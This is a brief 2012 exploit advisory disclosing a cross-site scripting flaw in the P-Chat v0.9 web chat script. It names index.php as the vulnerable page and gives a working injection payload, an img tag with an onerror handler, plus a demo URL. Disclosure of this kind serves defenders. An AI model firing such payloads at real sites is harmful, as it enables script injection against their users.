# Exploit Title: P-Chat v0.9 XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr

ISSUE

Cross Site Scripting can be done using the command input

Vulnerable Page:
index.php (XSS)

Example:
"/></a></><img src=eyup.gif onerror=alert(1)> (XSS Code)

POC:
http://limscripts.hostoi.com/demos/p-chat/index.php

Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr